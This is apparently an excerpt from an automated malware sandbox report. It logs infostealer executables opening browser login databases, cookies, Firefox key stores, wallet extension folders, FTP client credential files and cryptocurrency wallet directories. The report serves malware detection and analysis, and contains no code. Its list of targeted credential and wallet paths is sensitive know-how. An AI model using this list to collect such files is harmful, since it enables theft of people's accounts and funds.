Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
